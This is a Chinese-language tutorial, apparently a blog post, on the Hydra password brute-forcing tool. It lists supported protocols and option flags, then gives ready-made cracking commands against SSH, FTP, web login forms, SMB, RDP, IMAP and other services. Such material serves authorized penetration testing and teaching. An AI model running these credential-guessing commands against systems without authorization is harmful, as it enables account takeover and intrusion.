0x01簡介
hydra 是一個支持眾多協議的爆破工具,在kali上集成,但也可以在windows上下載運行;
github上的源碼: https://github.com/vanhauser-thc/thc-hydra
支持的協議:
adam6500、asterisk、cisco、cisco-enable、cvs、firebird、ftp、ftps、http[s]-{head|get|post}、
http[s]-{get|post}-form、http-proxy、http-proxy-urlenum、icq、imap[s]、irc、ldap2[s]、
ldap3[-{cram|digest}md5][s]、mssql、mysql、nntp、oracle-listener、oracle-sid、pcanywhere、
pcnfs、pop3[s]、postgres、radmin2、rdp、redis、rexec、rlogin、rpcap、rsh、rtsp、s7-300、sip、smb、
smtp[s]、smtp-enum、snmp、socks5、ssh、sshkey、svn、teamspeak、telnet[s]、vmauthd、vnc、xmpp
可以看出此爆破工具所涉及應用廣泛。
0x02使用
使用hdra -h 查看其選項參數

參數 用途 -l 指定單個用戶名,適合在知道用戶名爆破用戶名密碼時使用 -L 指定多個用戶名,參數值為存儲用戶名的文件的路徑 -p 指定單個密碼,適合在知道密碼爆破用戶名時使用 -P 指定多個密碼,參數值為存貯密碼的文件(通常稱為字典)的路徑 -C 當用戶名和密碼存儲到一個文件時使用此參數。注意,文件(字典)存儲的格式必須為 "用戶名:密碼" 的格式。 -M 指定多個攻擊目標,此參數為存儲攻擊目標的文件的路徑(建議為絕對路徑)。注意:列表文件存儲格式必須為 "地址:端口" -t 指定爆破時的任務數量(可以理解為線程數),默認為16 -s 指定端口,適用於攻擊目標端口非默認的情況。例如:http服務使用非80端口 -S 指定爆破時使用 SSL 鏈接 -R 繼續從上一次爆破進度上繼續爆破 -v 顯示爆破的詳細信息 -f 一但爆破成功一個就停止爆破
爆破什么協議就選擇什么協議模塊
常用的爆破語句:
1、破解ssh: hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh 2、破解ftp: hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV 3、get方式提交,破解web登錄: hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/ hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php 4、post方式提交,破解web登錄: hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" (參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中 的內容是表示錯誤猜解的返回信息提示。) 5、破解https: hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 6、破解teamspeak: hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak 7、破解cisco: hydra -P pass.txt 10.36.16.18 cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 8、破解smb: hydra -l administrator -P pass.txt 10.36.16.18 smb 9、破解pop3: hydra -l muts -P pass.txt my.pop3.mail pop3 10、破解rdp: hydra ip rdp -l administrator -P pass.txt -V 11、破解http-proxy: hydra -l admin -P pass.txt http-proxy://10.36.16.18 12、破解imap: hydra -L user.txt -p secret 10.36.16.18 imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
注意:爆破ssh使用的線程數是 4~7 個,由於ssh有限制連接數量的限定。
